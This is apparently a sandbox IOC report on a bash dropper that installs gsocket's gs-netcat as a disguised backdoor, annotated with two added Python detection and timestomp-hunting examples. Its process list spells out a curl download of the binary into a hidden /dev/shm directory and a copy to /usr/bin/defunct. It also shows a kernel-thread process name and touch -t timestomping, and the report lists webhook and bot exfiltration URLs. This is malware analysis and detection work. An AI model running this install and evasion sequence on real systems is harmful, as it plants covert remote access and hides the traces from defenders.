IOC Report
y

Files

File Path | Type | Category | Malicious
y | Bourne-Again shell script, ASCII text executable | initial sample | malicious
/dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 | ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped | dropped | malicious
/usr/bin/defunct | ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, stripped | dropped | malicious

Processes

Path | Cmdline
("-" means no command line was captured; the export records no per-process verdict)
/usr/bin/bash | /usr/bin/bash /tmp/y
/usr/bin/bash | - (x3)
/usr/bin/sed | sed s/[^a-zA-Z0-9]/\\\\&/g
(the preceding pair, three bash subshells followed by one sed, occurs 12 times in a row)
/usr/bin/bash | -
/usr/bin/uname | uname -m
/usr/bin/bash | - (x3)
/usr/bin/base64 | base64 -w0
/usr/bin/bash | -
/usr/bin/base64 | base64 -d
/usr/bin/bash | - (x4)
/usr/bin/sed | sed s/[^a-zA-Z0-9]/\\\\&/g
/usr/bin/bash | - (x2)
/usr/bin/pgrep | pgrep defunct
/usr/bin/bash | - (x2)
/usr/bin/pgrep | pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
/usr/bin/bash | - (x2)
/bin/bash | /bin/bash -c "echo TRUE"
/usr/bin/bash | -
/usr/bin/dirname | dirname /dev/shm/.gs-0
/usr/bin/bash | -
/usr/bin/dirname | dirname /dev/shm
/usr/bin/bash | - (x2)
/usr/bin/date | date -r /dev/shm +%Y%m%d%H%M.%S
/usr/bin/bash | -
/usr/bin/dirname | dirname /dev/shm/.gs-0
/usr/bin/bash | - (x2)
/usr/bin/ls | ls -atr /dev/shm
/usr/bin/bash | -
/usr/bin/head | head -n1
/usr/bin/bash | - (x2)
/usr/bin/date | date -r /dev/shm/.. +%Y%m%d%H%M.%S
/usr/bin/bash | -
/usr/bin/mkdir | mkdir /dev/shm/.gs-0
/usr/bin/bash | -
/usr/bin/chmod | chmod 700 /dev/shm/.gs-0
/usr/bin/bash | - (x2)
/usr/bin/touch | touch /dev/shm/.gs-0/.gs-rw.lock
/usr/bin/bash | -
/usr/bin/rm | rm -f /dev/shm/.gs-0/.gs-rw.lock
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin
/usr/bin/bash | - (x2)
/usr/bin/date | date -r /usr/bin +%Y%m%d%H%M.%S
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin/defunct
/usr/bin/bash | - (x2)
/usr/bin/ls | ls -atr /usr/bin
/usr/bin/bash | -
/usr/bin/head | head -n1
/usr/bin/bash | - (x2)
/usr/bin/date | date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S
/usr/bin/bash | -
/usr/bin/touch | touch /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/chmod | chmod 600 /usr/bin/defunct
/usr/bin/bash | - (x2)
/usr/bin/basename | basename /bin/true
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin/defunct
/usr/bin/bash | - (x6)
/usr/bin/base64 | base64 -w0
/usr/bin/bash | - (x4)
/usr/bin/base64 | base64 -w0
/usr/bin/bash | - (x4)
/usr/bin/base64 | base64 -w0
/usr/bin/bash | - (x2)
/usr/bin/curl | curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
/usr/bin/bash | -
/usr/bin/mv | mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/rm | rm -f /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/dirname | dirname /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/touch | touch /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/chmod | chmod 600 /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/cp | cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct
/usr/bin/bash | -
/usr/bin/dirname | dirname /dev/shm/.gs-0/gs-netcat
/usr/bin/bash | -
/usr/bin/rm | rm -f /dev/shm/.gs-0/gs-netcat
/usr/bin/bash | -
/usr/bin/chmod | chmod 700 /usr/bin/defunct
/usr/bin/bash | - (x2)
/usr/bin/defunct | /usr/bin/defunct -g
/usr/bin/bash | -
/usr/bin/defunct | [slub_flushwq]
/usr/bin/bash | -
/usr/bin/rm | rm -rf /dev/shm/.gs-0/*
/usr/bin/bash | -
/usr/bin/rmdir | rmdir /dev/shm/.gs-0
/usr/bin/bash | -
/usr/bin/touch | touch -t 202410010411.39 /dev/shm
/usr/bin/bash | -
/usr/bin/touch | touch -t 202109170423.51 /usr/bin
/usr/bin/bash | -
/usr/bin/touch | touch -t 200611251713.29 /usr/bin/defunct
(168 further processes are not included in this export)
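
Read top to bottom, the process list is an install sequence: the script creates a hidden staging directory under /dev/shm (mkdir /dev/shm/.gs-0, chmod 700), reads the current mtimes of /dev/shm and /usr/bin and of the oldest entry in /usr/bin (date -r ..., ls -atr | head -n1), fetches gs-netcat_mini with curl into the staging directory, copies it to /usr/bin/defunct and makes it mode 700, runs it (first as /usr/bin/defunct -g, then with the argv[0] [slub_flushwq], one of the kernel-thread names listed in the pgrep pattern), removes the staging directory, and finally resets the mtimes of /dev/shm, /usr/bin and /usr/bin/defunct with touch -t to the values it read earlier. The detection below is an added example written for this page, not code from the sandbox vendor or from the gsocket project. It runs a small rule set over execve-style records constructed from the command lines above; the pids and ppids are invented, and every command is attributed to one parent shell, whereas the real tree runs each command under its own bash subshell (the "-" rows), so a production version would follow ppid chains back to the script or key on the session id instead of the direct parent.

```python
"""Flag a gsocket-style deployment in execve telemetry (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Exec:
    pid: int
    ppid: int
    path: str     # executable that was run
    cmdline: str  # argv joined with spaces, as the report renders it


# Constructed from the Processes table above; pids/ppids are invented and all
# commands are hung off one parent shell (pid 100) for the sake of the example.
SAMPLE = [
    Exec(100, 1, "/usr/bin/bash", "/usr/bin/bash /tmp/y"),
    Exec(101, 100, "/usr/bin/mkdir", "mkdir /dev/shm/.gs-0"),
    Exec(102, 100, "/usr/bin/chmod", "chmod 700 /dev/shm/.gs-0"),
    Exec(103, 100, "/usr/bin/date", "date -r /usr/bin +%Y%m%d%H%M.%S"),
    Exec(104, 100, "/usr/bin/curl", "curl -fsSL --connect-timeout 7 -m900 --retry 3 "
         "https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 "
         "--output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64"),
    Exec(105, 100, "/usr/bin/cp", "cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct"),
    Exec(106, 100, "/usr/bin/chmod", "chmod 700 /usr/bin/defunct"),
    Exec(107, 100, "/usr/bin/defunct", "[slub_flushwq]"),
    Exec(108, 100, "/usr/bin/rmdir", "rmdir /dev/shm/.gs-0"),
    Exec(109, 100, "/usr/bin/touch", "touch -t 200611251713.29 /usr/bin/defunct"),
    Exec(110, 1, "/usr/bin/ls", "ls -atr /usr/bin"),  # benign noise
]

TMPFS = re.compile(r"^/(dev/shm|tmp|var/tmp)/")
HIDDEN_SHM = re.compile(r"^/dev/shm/\.")
SYSTEM_BIN = re.compile(r"^/(usr/(local/)?)?s?bin/")
KTHREAD_STYLE = re.compile(r"^\[[^\]]+\]$")  # how ps renders kernel threads


def rules_for(e: Exec) -> list[str]:
    """Names of every rule a single execve record trips (whitespace argv split)."""
    args = e.cmdline.split()
    tool = e.path.rsplit("/", 1)[-1]
    hits: list[str] = []
    if any(HIDDEN_SHM.match(a) for a in args):
        hits.append("hidden_dir_under_dev_shm")
    if tool in ("curl", "wget") and any(TMPFS.match(a) for a in args):
        hits.append("download_to_tmpfs")
    if (tool in ("cp", "mv", "install") and len(args) >= 3
            and TMPFS.match(args[-2]) and SYSTEM_BIN.match(args[-1])):
        hits.append("tmpfs_to_system_bin")
    if tool == "touch" and any(a in ("-t", "-d", "-r") for a in args):
        hits.append("timestomp")
    # Kernel threads are created in-kernel and never pass through execve, so a
    # bracketed argv[0] in an execve record is a userland process by construction.
    if KTHREAD_STYLE.match(e.cmdline):
        hits.append("kernel_thread_name_from_userland")
    return hits


def deployment_chains(records: list[Exec], min_rules: int = 3) -> dict[int, list[str]]:
    """Parent pids whose children trip at least `min_rules` distinct rules.

    No single rule is convincing on its own (installers curl into /tmp, build
    scripts use touch -r); the combination under one parent is.
    """
    by_parent: dict[int, set[str]] = {}
    for e in records:
        for r in rules_for(e):
            by_parent.setdefault(e.ppid, set()).add(r)
    return {p: sorted(rs) for p, rs in by_parent.items() if len(rs) >= min_rules}


if __name__ == "__main__":
    for ppid, rules in deployment_chains(SAMPLE).items():
        print(f"parent pid {ppid}: {', '.join(rules)}")
```

The kernel-thread rule is the cheap, high-confidence one; the rest are noisy individually, which is why the verdict is taken per parent over the set of rules tripped. Argument splitting here is on whitespace and ignores shell quoting; when auditd or an eBPF tracer gives you the argv array, feed that in instead of a reconstructed string.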

URLs

Name | IP | Malicious
https://www.gsocket.io/deploy/ | unknown | malicious
https://cdn.gsocket.io | unknown | malicious
https://github.com/hackerschoice/gsocket-relay | unknown | malicious
https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 | 92.60.39.208 | malicious
https://foo.blah/log.php?s= | unknown
https://gsocket.io | unknown
https://t.me/thcorg$ | unknown
https://webhook.site | unknown
https://github.com/hackerschoice/gsocket/releases$ | unknown
https://webhook.site/$ | unknown
https://api.telegram.org/bot$ | unknown
https://discord.com/api/webhooks/$ | unknown
https://gsocket.io/x) | unknown
(3 further URLs are not included in this export)

Domains

Name | IP | Malicious
cdn.gsocket.io | 92.60.39.208
c.gs.thc.org | 45.14.164.3

IPs

IP | Domain | Country | Malicious
92.60.39.208 | cdn.gsocket.io | Germany
109.202.202.202 | unknown | Switzerland
45.14.164.3 | c.gs.thc.org | Germany
91.189.91.43 | unknown | United Kingdom
91.189.91.42 | unknown | United Kingdom
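
The three touch -t commands at the end of the process list set the mtime of /usr/bin/defunct to the value read by date -r /usr/bin/dirsplit (the oldest entry returned by ls -atr /usr/bin | head -n1) and put the mtimes of /usr/bin and /dev/shm back to what they were before the install. touch can set atime and mtime, but ctime is written by the kernel on every inode change and cannot be set from userland short of changing the system clock or editing the inode offline, so the stomped paths end up with a ctime long after their mtime. The hunt below is an added example written for this page, not code from the sandbox vendor or from gsocket: the Stat records are constructed from the report's timestamps, the wall-clock time of the deployment (used as the ctime of the touched paths) is invented because the report does not record it, and the package-ownership set stands in for dpkg -S / rpm -qf output.

```python
"""Hunt for the timestomped paths and tmpfs staging dir from the report (added example)."""
from __future__ import annotations

import os
import shutil
import stat
import subprocess
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class Stat:
    path: str
    is_dir: bool
    mtime: int  # seconds since the epoch
    ctime: int


def ts(y: int, mo: int, d: int, h: int, mi: int, s: int) -> int:
    return int(datetime(y, mo, d, h, mi, s, tzinfo=timezone.utc).timestamp())


# Assumed wall-clock time of the deployment; the report does not record it.
T_DEPLOY = ts(2024, 12, 1, 0, 0, 0)

# Constructed from the touch -t / date -r commands in the Processes table.
SAMPLE_STATS = [
    Stat("/usr/bin", True, ts(2021, 9, 17, 4, 23, 51), T_DEPLOY),             # touch -t 202109170423.51 /usr/bin
    Stat("/usr/bin/defunct", False, ts(2006, 11, 25, 17, 13, 29), T_DEPLOY),  # touch -t 200611251713.29 /usr/bin/defunct
    Stat("/usr/bin/dirsplit", False, ts(2006, 11, 25, 17, 13, 29),            # the neighbour whose mtime was copied;
         ts(2021, 9, 17, 4, 23, 51)),                                         # its install-time ctime is assumed
    Stat("/usr/bin/ls", False, ts(2024, 3, 1, 0, 0, 0), ts(2024, 3, 1, 0, 0, 5)),  # ordinary packaged file, assumed
    Stat("/dev/shm", True, ts(2024, 10, 1, 4, 11, 39), T_DEPLOY),             # touch -t 202410010411.39 /dev/shm
]
# Stand-in for the package manager's file list (dpkg -S / rpm -qf); assumed.
PACKAGED = frozenset({"/usr/bin/dirsplit", "/usr/bin/ls"})


def timestomp_suspects(stats: list[Stat], packaged: frozenset[str] = frozenset(),
                       gap: int = 86400) -> list[str]:
    """Paths whose ctime runs at least `gap` seconds ahead of their mtime.

    Directories are always reported: content changes move mtime and ctime
    together, so a large skew means a metadata-only change (touch -t, chmod,
    chown). Regular files are reported only when no package owns them, because
    a packaged file legitimately keeps the build mtime and gets an install ctime.
    """
    hits = []
    for s in stats:
        if s.ctime - s.mtime < gap:
            continue
        if s.is_dir or s.path not in packaged:
            hits.append(s.path)
    return hits


def hidden_staging_dirs(names: list[str], root: str = "/dev/shm") -> list[str]:
    """Dot-prefixed entries in a tmpfs directory (the script used /dev/shm/.gs-0)."""
    return [os.path.join(root, n) for n in sorted(names)
            if n.startswith(".") and n not in (".", "..")]


def stat_paths(paths: list[str]) -> list[Stat]:
    """Live helper: lstat each path into a Stat record, skipping unreadable ones."""
    out = []
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue
        out.append(Stat(p, stat.S_ISDIR(st.st_mode), int(st.st_mtime), int(st.st_ctime)))
    return out


def dpkg_owned(paths: list[str]) -> frozenset[str]:
    """Live helper: the subset of `paths` owned by a Debian package (empty without dpkg)."""
    if not paths or shutil.which("dpkg") is None:
        return frozenset()
    out = subprocess.run(["dpkg", "-S", *paths], capture_output=True, text=True).stdout
    return frozenset(line.rsplit(": ", 1)[1] for line in out.splitlines() if ": " in line)


if __name__ == "__main__":
    print("constructed sample:", timestomp_suspects(SAMPLE_STATS, PACKAGED))
    bindir = "/usr/bin"
    paths = [bindir] + [os.path.join(bindir, n) for n in os.listdir(bindir)]
    print("live /usr/bin:", timestomp_suspects(stat_paths(paths), dpkg_owned(paths[1:])))
    if os.path.isdir("/dev/shm"):
        print("hidden in /dev/shm:", hidden_staging_dirs(os.listdir("/dev/shm")))
```

On a non-Debian host dpkg_owned() returns an empty set and the live file check degrades to "every file with an install ctime", so supply the ownership set from rpm -qf or equivalent there; the directory check and the /dev/shm listing need no package data. The dropped binary also stands out on an independent axis the block does not cover: it is a static-pie, stripped ELF in /usr/bin that no package claims.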